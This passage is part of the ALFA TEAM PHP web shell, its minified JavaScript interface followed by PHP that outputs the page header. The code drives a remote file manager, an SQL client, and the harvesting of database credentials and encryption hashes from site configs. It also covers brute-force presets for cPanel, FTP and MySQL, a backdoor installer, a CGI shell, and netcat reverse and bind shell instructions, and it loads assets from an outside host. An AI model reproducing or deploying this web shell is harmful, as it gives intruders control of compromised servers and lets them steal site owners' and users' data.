fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\\/\\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\\/\\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id=\'loader_"+e+\'\\\' class="options-loader-holder"><div parent="\'+e+\'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\\\'http://solevisible.com/images/loader.svg\\\'></div>\')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML=\'<label class="inputfile" for="\'+e+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+e+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');" multiple>\',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\\./g,"\\\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\\//g,"")==f.replace(/\\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick=\'editorTabController(this);\' opt_id=\'"+b+"\' id=\'tab_"+b+"\' class=\'editor-tab-name editor-tab-active\'>"+decodeURIComponent(e)+" <img opt_id=\'"+b+"\' onclick=\'closeEditorContent(this,event);return false;\' title=\'[close]\' src=\'http://solevisible.com/icons/menu/delete.svg\'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class=\'editor-contents editor-content-active\' id=\'"+b+"\'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\\/\\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id=\'"+e+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(a,i,e)+"</div><div class=\'editor-file-name\'>"+a+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\\""+e+"\\");\'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class=\'editor-icon\'>"+loadType(editor_files[t].file,e,t)+"</div><div class=\'editor-file-name\'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return\'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor(\'"+a+"\',\'auto\',\'\',\'\',\'\',\'file\')"),$(r).setAttribute("onclick","editor(\'"+a+"\',\'edit\',\'\',\'\',\'\',\'"+s+"\')"),$(n).setAttribute("onclick","g(\'FilesTools\',null,\'"+a+"\', \'download\')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g(\'FilesMan\', \'"+c_+"/"+a+"\')")),$(i).setAttribute("onclick","editor(\'"+a+"\',\'chmod\',\'\',\'\',\'\',\'"+s+"\')"),$(l).setAttribute("onclick","editor(\'"+a+"\',\'rename\',\'\',\'\',\'\',\'"+s+"\')"),$(o).setAttribute("onclick","editor(\'"+a+"\',\'touch\',\'\',\'\',\'\',\'"+s+"\')"),$(d).setAttribute("onclick","var chk = confirm(\'Are You Sure For Delete # "+a+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+a+"\') : \'\';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\\/\\//g,"/"),l=l.replace(/\\/\\//g,"/"),-1!=(t=t.replace(/\\/\\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\\/\\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\\/\\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};\r\n</script>\r\n<?php echo"<form style=\'display:none;\' id=\'dlForm\' action=\'\' target=\'_blank\' method=\'post\'>\r\n<input type=\'hidden\' name=\'a\' value=\'dlfile\'>\r\n<input type=\'hidden\' name=\'c\' value=\'\'>\r\n<input type=\'hidden\' name=\'file\' value=\'\'>\r\n</form>\r\n<input type=\'file\' style=\'display:none;\' id=\'importFileBtn\' onchange=\'importConfig(event);\'>\r\n<div id=\'a_loader\'><img src=\'".__showicon(\'loader\')."\'></div>";\r\n$cmd_uname = alfaEx("uname -a",false,false);\r\n$uname = function_exists(\'php_uname\') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:\'( php_uname ) Function Disabled !\');\r\nif($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}\r\necho \'\r\n</head>\r\n<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">\r\n<div id="up_bar_holder"></div>\r\n<div class="whole">\r\n<form method="post" name="mf" style="display:none;">\r\n<input type="hidden" name="a">\r\n<input type="hidden" name="c" value="\'.$GLOBALS[\'cwd\'].\'">\';\r\nfor($s=1;$s<=10;$s++){\r\necho \'<input type="hidden" name="alfa\'.$s.\'">\';\r\n}\r\necho \'<input type="hidden" name="charset">\r\n</form>\r\n<div id=\\\'hidden_sh\\\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">\'.__ALFA_CODE_NAME__.\'</span><br><small>Version: <span class="hidden_shell_version">\'.__ALFA_VERSION__.\'</span></small></a></div>\r\n<div class="header"><table width="100%" border="0">\r\n<tr>\r\n<td width="3%"><span class="header_vars">Uname:</span></td>\r\n<td colspan="2"><span class="header_values" 